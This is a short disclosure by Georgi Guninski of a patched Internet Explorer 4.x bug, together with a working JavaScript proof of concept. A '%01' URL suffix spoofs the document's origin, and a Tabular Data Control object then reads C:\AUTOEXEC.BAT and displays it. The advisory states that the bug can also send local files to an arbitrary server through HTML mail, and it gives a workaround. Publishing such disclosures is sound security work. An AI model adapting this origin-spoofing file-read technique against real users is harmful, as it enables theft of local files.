Guninski's IE 4 reading AUTOEXEC.BAT.


There is a bug in Internet Explorer 4.x (patched) which allows reading local files and sending them to an arbitrary server.

The problem is: if you add '%01someURL' after the an about: URL, IE thinks that the document is loaded from the domain of 'someURL'.

This circumvents "Cross-frame security" and opens several security holes.


This will try to read C:\AUTOEXEC.BAT using TDC.

The bug may be exploited using HTML mail message. The exploit uses Javascript. 
For more info see the source.


Workaround: Disable Javascript.

Written by http://www.geocities.com/ResearchTriangle/1711 - Georgi Guninski



<SCRIPT>

alert('This tries to read your AUTOEXEC.BAT\nWait few seconds.')

s="about:<SCRIPT>a=window.open('view-source:x');a.document.open();a.document.write(\"<object id='myTDC' width=100 height=100 classid='CLSID:333C7BC4-460F-11D0-BC04-0080C7055A83'>"
+"<param name='DataURL' value='c:/autoexec.bat'><param name='UseHeader' value=False><param name='CharSet' VALUE='iso-8859-1'><param name='FieldDelim' value='}'><param name='RowDelim' value='}'><param name='TextQualifier' value='}'>"
+"</object><form><textarea datasrc='#myTDC' datafld='Column1' rows=10 cols=80></textarea></form>\");a.document.write('<SCRIPT>setTimeout(\"alert(document.forms[0].elements[0].value)\",4000)</SCRIPT');a.document.write('>');a.document.close();close()</"+"SCRIPT>%01file://c:/";


b=showModalDialog(s);

</SCRIPT>